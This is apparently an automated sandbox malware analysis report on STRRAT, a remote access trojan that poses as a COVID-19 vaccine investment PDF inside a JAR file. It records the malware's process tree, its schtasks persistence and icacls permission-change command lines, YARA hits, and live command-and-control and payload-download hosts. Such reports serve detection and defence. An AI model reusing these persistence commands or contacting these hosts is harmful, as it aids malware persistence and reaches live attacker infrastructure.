Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar

Overview

General Information

Sample Name:Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar
Analysis ID:356987
MD5:5435ec679cdd07fe6f4fc6f49a117ea8
SHA1:eab4494e7db4bcbebf9dc5c0197ce0081a6dda6e
SHA256:5a962977909fafba0a1c202306068bd5f8297335b16989a07c1f119302155c84
Infos:

Most interesting Screenshot:

Detection

STRRAT
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected STRRAT
Connects to a pastebin service (likely for C&C)
Creates autostart registry keys to launch java
Creates multiple autostart registry keys
Exploit detected, runtime environment dropped PE file
Exploit detected, runtime environment starts unknown processes
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Allatori_JAR_Obfuscator
Contains capabilities to detect virtual machines
Contains functionality to query CPU information (cpuid)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the installed Java version
Queries the volume information (name, serial number etc) of a device
Stores files to the Windows start menu directory
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • cmd.exe (PID: 4952 cmdline: C:\Windows\system32\cmd.exe /c 7za.exe x -y -oC:\jar 'C:\Users\user\Desktop\Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • 7za.exe (PID: 384 cmdline: 7za.exe x -y -oC:\jar 'C:\Users\user\Desktop\Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar' MD5: 77E556CDFDC5C592F5C46DB4127C6F4C)
    • conhost.exe (PID: 4904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • java.exe (PID: 6284 cmdline: 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -jar 'C:\Users\user\AppData\Roaming\plugins.jar' mp MD5: 28733BA8C383E865338638DF5196E6FE)
      • conhost.exe (PID: 6364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cmd.exe (PID: 4120 cmdline: 'C:\Windows\System32\cmd.exe' /c java.exe -jar 'C:\Users\user\Desktop\Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar' keuqzwqbvn.Mmwwrnygnfl >> C:\cmdlinestart.log 2>&1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 5708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • java.exe (PID: 5544 cmdline: java.exe -jar 'C:\Users\user\Desktop\Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar' keuqzwqbvn.Mmwwrnygnfl MD5: 28733BA8C383E865338638DF5196E6FE)
      • icacls.exe (PID: 5980 cmdline: C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M MD5: FF0D1D4317A44C951240FAE75075D501)
        • conhost.exe (PID: 384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • wscript.exe (PID: 5712 cmdline: wscript C:\Users\user\fukvowbkrs.js MD5: 7075DD7B9BE8807FCA93ACD86F724884)
        • javaw.exe (PID: 3164 cmdline: 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\vmlpusjwhz.txt' MD5: 4BFEB2F64685DA09DEBB95FB981D4F65)
          • java.exe (PID: 720 cmdline: 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -jar 'C:\Users\user\vmlpusjwhz.txt' MD5: 28733BA8C383E865338638DF5196E6FE)
            • conhost.exe (PID: 5988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • cmd.exe (PID: 5848 cmdline: cmd /c schtasks /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\vmlpusjwhz.txt' MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 3096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • schtasks.exe (PID: 5312 cmdline: schtasks /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\vmlpusjwhz.txt' MD5: 15FF7D8324231381BAD48A052F85DF04)
            • java.exe (PID: 4952 cmdline: 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -jar 'C:\Users\user\AppData\Roaming\vmlpusjwhz.txt' MD5: 28733BA8C383E865338638DF5196E6FE)
  • notepad.exe (PID: 2596 cmdline: C:\Windows\system32\NOTEPAD.EXE C:\Users\user\AppData\Roaming\vmlpusjwhz.txt MD5: BB9A06B8F2DD9D24C77F389D7B2B58D2)
  • notepad.exe (PID: 6576 cmdline: 'C:\Windows\system32\NOTEPAD.EXE' C:\Users\user\AppData\Roaming\vmlpusjwhz.txt MD5: BB9A06B8F2DD9D24C77F389D7B2B58D2)
  • notepad.exe (PID: 7136 cmdline: 'C:\Windows\system32\NOTEPAD.EXE' C:\Users\user\AppData\Roaming\vmlpusjwhz.txt MD5: BB9A06B8F2DD9D24C77F389D7B2B58D2)
  • javaw.exe (PID: 4880 cmdline: 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\plugins.jar' mp MD5: 4BFEB2F64685DA09DEBB95FB981D4F65)
  • notepad.exe (PID: 6504 cmdline: 'C:\Windows\system32\NOTEPAD.EXE' C:\Users\user\AppData\Roaming\vmlpusjwhz.txt MD5: BB9A06B8F2DD9D24C77F389D7B2B58D2)
  • javaw.exe (PID: 6568 cmdline: 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\plugins.jar' mp MD5: 4BFEB2F64685DA09DEBB95FB981D4F65)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\jar\keuqzwqbvn\resources\umxybpjabcSUSP_Base64_Encoded_Hex_Encoded_CodeDetects hex encoded code that has been base64 encodedFlorian Roth
  • 0x34d:$x1: 78 34 4E 54 56 63 65 44 51 31 58 48 67
  • 0x35d:$x1: 78 34 4E 44 52 63 65 44 51 79 58 48 67
  • 0x36d:$x1: 78 34 4E 54 46 63 65 44 4E 46 58 48 67
  • 0x37d:$x1: 78 34 4E 44 42 63 65 44 51 7A 58 48 67
  • 0x39d:$x1: 78 34 4E 44 6C 63 65 44 4E 46 58 48 67
  • 0x3ad:$x1: 78 34 4E 44 42 63 65 44 52 42 58 48 67
  • 0x3bd:$x1: 78 34 4E 54 6D 63 65 44 55 32 58 48 67
  • 0x3cd:$x1: 78 34 4E 44 6C 63 65 44 4E 46 58 48 67
  • 0x3dd:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x3ed:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x3fd:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x40d:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x41d:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x42d:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x43d:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x44d:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x45d:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x46d:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x47d:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x48d:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x49d:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
C:\Users\user\fukvowbkrs.jsSUSP_Base64_Encoded_Hex_Encoded_CodeDetects hex encoded code that has been base64 encodedFlorian Roth
  • 0x34d:$x1: 78 34 4E 54 56 63 65 44 51 31 58 48 67
  • 0x35d:$x1: 78 34 4E 44 52 63 65 44 51 79 58 48 67
  • 0x36d:$x1: 78 34 4E 54 46 63 65 44 4E 46 58 48 67
  • 0x37d:$x1: 78 34 4E 44 42 63 65 44 51 7A 58 48 67
  • 0x39d:$x1: 78 34 4E 44 6C 63 65 44 4E 46 58 48 67
  • 0x3ad:$x1: 78 34 4E 44 42 63 65 44 52 42 58 48 67
  • 0x3bd:$x1: 78 34 4E 54 6D 63 65 44 55 32 58 48 67
  • 0x3cd:$x1: 78 34 4E 44 6C 63 65 44 4E 46 58 48 67
  • 0x3dd:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x3ed:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x3fd:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x40d:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x41d:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x42d:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x43d:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x44d:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x45d:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x46d:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x47d:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x48d:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67
  • 0x49d:$x1: 78 34 4E 44 42 63 65 44 4E 46 58 48 67

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000018.00000002.521334832.000000000A810000.00000004.00000001.sdmpJoeSecurity_STRRATYara detected STRRATJoe Security
    00000010.00000002.519763899.0000000004ECD000.00000004.00000001.sdmpJoeSecurity_STRRATYara detected STRRATJoe Security
      00000010.00000002.517894566.0000000004DCD000.00000004.00000001.sdmpJoeSecurity_STRRATYara detected STRRATJoe Security
        00000010.00000002.520726996.0000000009F9E000.00000004.00000001.sdmpJoeSecurity_Allatori_JAR_ObfuscatorYara detected Allatori_JAR_ObfuscatorJoe Security
          00000027.00000002.352640886.000000000461D000.00000004.00000001.sdmpJoeSecurity_Allatori_JAR_ObfuscatorYara detected Allatori_JAR_ObfuscatorJoe Security
            Click to see the 23 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            Compliance:

            barindex
            Uses new MSVCR DllsShow sources
            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
            Uses secure TLS version for HTTPS connectionsShow sources
            Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.3:49721 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.3:49719 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.3:49720 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.3:49718 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.199.108.154:443 -> 192.168.2.3:49722 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.23.99.190:443 -> 192.168.2.3:49729 version: TLS 1.2

            Software Vulnerabilities:

            barindex
            Exploit detected, runtime environment starts unknown processesShow sources
            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeProcess created: C:\Windows\SysWOW64\wscript.exe

            Networking:

            barindex
            Connects to a pastebin service (likely for C&C)Show sources
            Source: unknownDNS query: name: pastebin.com
            Uses dynamic DNS servicesShow sources
            Source: unknownDNS query: name: pluginserver.duckdns.org
            Source: unknownDNS query: name: strizzz100.duckdns.org
            Source: global trafficTCP traffic: 192.168.2.3:49728 -> 107.175.144.243:4040
            Source: global trafficTCP traffic: 192.168.2.3:49732 -> 23.239.31.129:54557
            Source: Joe Sandbox ViewIP Address: 104.23.99.190 104.23.99.190
            Source: Joe Sandbox ViewIP Address: 104.23.99.190 104.23.99.190
            Source: Joe Sandbox ViewIP Address: 23.239.31.129 23.239.31.129
            Source: Joe Sandbox ViewASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
            Source: Joe Sandbox ViewJA3 fingerprint: d2935c58fe676744fecc8614ee5356c7
            Source: unknownDNS traffic detected: queries for: repo1.maven.org
            Source: java.exe, 0000000D.00000002.252198805.0000000005052000.00000004.00000001.sdmp, java.exe, 00000010.00000002.520685745.0000000009F96000.00000004.00000001.sdmpString found in binary or memory: http://bugreport.sun.com/bugreport/
            Source: javaw.exe, 0000000B.00000002.241108342.000000000A32F000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.238111305.0000000004E79000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt
            Source: javaw.exe, 0000000B.00000002.240730122.000000000A276000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
            Source: javaw.exe, 0000000B.00000002.238279843.0000000004EEF000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt3
            Source: javaw.exe, 0000000B.00000002.238111305.0000000004E79000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt;S
            Source: javaw.exe, 0000000B.00000002.238100254.0000000004E6C000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crtA
            Source: javaw.exe, 0000000B.00000002.238100254.0000000004E6C000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crtA0
            Source: javaw.exe, 0000000B.00000002.238201447.0000000004EB6000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crtCp3
            Source: javaw.exe, 0000000B.00000002.238279843.0000000004EEF000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crts
            Source: javaw.exe, 0000000B.00000002.241108342.000000000A32F000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.238201447.0000000004EB6000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt
            Source: javaw.exe, 0000000B.00000002.238166814.0000000004EAC000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
            Source: javaw.exe, 0000000B.00000002.238201447.0000000004EB6000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt3r3
            Source: java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html
            Source: javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
            Source: java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl
            Source: javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
            Source: java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crlC5
            Source: javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253571843.000000000A727000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl
            Source: javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253571843.000000000A727000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl
            Source: javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl
            Source: javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
            Source: javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253571843.000000000A727000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
            Source: javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
            Source: javaw.exe, 0000000B.00000002.241108342.000000000A32F000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.238201447.0000000004EB6000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl
            Source: javaw.exe, 0000000B.00000002.238166814.0000000004EAC000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: javaw.exe, 0000000B.00000002.238111305.0000000004E79000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crlK
            Source: javaw.exe, 0000000B.00000002.238279843.0000000004EEF000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl
            Source: javaw.exe, 0000000B.00000002.240730122.000000000A276000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
            Source: javaw.exe, 0000000B.00000002.238100254.0000000004E6C000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crlA0
            Source: javaw.exe, 0000000B.00000002.241108342.000000000A32F000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.238201447.0000000004EB6000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl
            Source: javaw.exe, 0000000B.00000002.238166814.0000000004EAC000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
            Source: javaw.exe, 0000000B.00000002.238201447.0000000004EB6000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crlk
            Source: javaw.exe, 0000000B.00000002.238111305.0000000004E79000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl
            Source: javaw.exe, 0000000B.00000002.238166814.0000000004EAC000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: javaw.exe, 0000000B.00000002.241108342.000000000A32F000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.238111305.0000000004E79000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl
            Source: javaw.exe, 0000000B.00000002.241025352.000000000A317000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
            Source: javaw.exe, 0000000B.00000002.241108342.000000000A32F000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl
            Source: javaw.exe, 0000000B.00000002.240730122.000000000A276000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0L
            Source: javaw.exe, 0000000B.00000002.238201447.0000000004EB6000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl;
            Source: javaw.exe, 0000000B.00000002.238100254.0000000004E6C000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crlA
            Source: javaw.exe, 0000000B.00000002.238201447.0000000004EB6000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crlk
            Source: javaw.exe, 0000000B.00000002.241108342.000000000A32F000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.238201447.0000000004EB6000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl
            Source: javaw.exe, 0000000B.00000002.238166814.0000000004EAC000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
            Source: java.exe, 00000006.00000002.207053367.0000000004800000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.238616990.0000000009FA2000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253246566.000000000A5A2000.00000004.00000001.sdmp, java.exe, 00000010.00000002.520749260.0000000009FA0000.00000004.00000001.sdmpString found in binary or memory: http://java.oracle.com/
            Source: java.exe, 00000010.00000002.515417464.0000000004BAB000.00000004.00000001.sdmpString found in binary or memory: http://jbfrost.live/strigoi/server/?hwid=1&lid=m&ht=5
            Source: javaw.exe, 0000000B.00000003.228995438.00000000150EA000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.239181413.000000000A03C000.00000004.00000001.sdmp, java.exe, 0000000D.00000003.248758362.0000000015676000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253348649.000000000A630000.00000004.00000001.sdmp, java.exe, 00000010.00000003.277137784.0000000014FD2000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521112026.000000000A02F000.00000004.00000001.sdmpString found in binary or memory: http://null.oracle.com/
            Source: javaw.exe, 0000000B.00000002.241108342.000000000A32F000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.238111305.0000000004E79000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.238201447.0000000004EB6000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com
            Source: javaw.exe, 0000000B.00000002.238166814.0000000004EAC000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: javaw.exe, 0000000B.00000002.238166814.0000000004EAC000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0F
            Source: javaw.exe, 0000000B.00000002.241025352.000000000A317000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0K
            Source: javaw.exe, 0000000B.00000002.240730122.000000000A276000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0M
            Source: javaw.exe, 0000000B.00000002.238111305.0000000004E79000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com3
            Source: javaw.exe, 0000000B.00000002.238111305.0000000004E79000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com;
            Source: javaw.exe, 0000000B.00000002.238100254.0000000004E6C000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.comA0
            Source: javaw.exe, 0000000B.00000002.238201447.0000000004EB6000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.comC
            Source: javaw.exe, 0000000B.00000002.238111305.0000000004E79000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.comK
            Source: javaw.exe, 0000000B.00000002.238279843.0000000004EEF000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.coms
            Source: wscript.exe, 0000000A.00000003.214763026.0000000004F0D000.00000004.00000001.sdmpString found in binary or memory: http://ops.com.pa/jre7.zip
            Source: java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpString found in binary or memory: http://policy.camerfirma.com
            Source: javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpString found in binary or memory: http://policy.camerfirma.com0
            Source: java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpString found in binary or memory: http://repository.swisssign.com/
            Source: javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpString found in binary or memory: http://repository.swisssign.com/0
            Source: java.exe, 00000010.00000002.517894566.0000000004DCD000.00000004.00000001.sdmpString found in binary or memory: http://str-master.pw
            Source: java.exe, 00000010.00000002.517809140.0000000004DC1000.00000004.00000001.sdmpString found in binary or memory: http://str-master.pw/strigoi/server/ping.php
            Source: java.exe, 00000010.00000002.517894566.0000000004DCD000.00000004.00000001.sdmpString found in binary or memory: http://str-master.pw/strigoi/server/ping.php?
            Source: java.exe, 00000010.00000002.517809140.0000000004DC1000.00000004.00000001.sdmpString found in binary or memory: http://str-master.pw/strigoi/server/ping.php?lid=
            Source: java.exe, 00000010.00000002.517894566.0000000004DCD000.00000004.00000001.sdmp, java.exe, 00000010.00000002.517809140.0000000004DC1000.00000004.00000001.sdmpString found in binary or memory: http://str-master.pw/strigoi/server/ping.php?lid=RUGR-ATSN-D14P-VBXX-49LW
            Source: java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpString found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl
            Source: javaw.exe, 0000000B.00000002.242664932.000000001582F000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpString found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
            Source: javaw.exe, 0000000B.00000002.238594494.0000000009FA0000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253231810.000000000A5A0000.00000004.00000001.sdmp, java.exe, 00000010.00000002.520726996.0000000009F9E000.00000004.00000001.sdmpString found in binary or memory: http://www.allatori.com
            Source: javaw.exe, 0000000B.00000002.240871910.000000000A2CE000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/
            Source: java.exe, 0000000D.00000003.248758362.0000000015676000.00000004.00000001.sdmp, java.exe, 00000010.00000003.277137784.0000000014FD2000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.txt
            Source: java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crl
            Source: javaw.exe, 0000000B.00000002.242664932.000000001582F000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crl0
            Source: java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl
            Source: javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
            Source: javaw.exe, 0000000B.00000002.240871910.000000000A2CE000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253571843.000000000A727000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpString found in binary or memory: http://www.chambersign.org
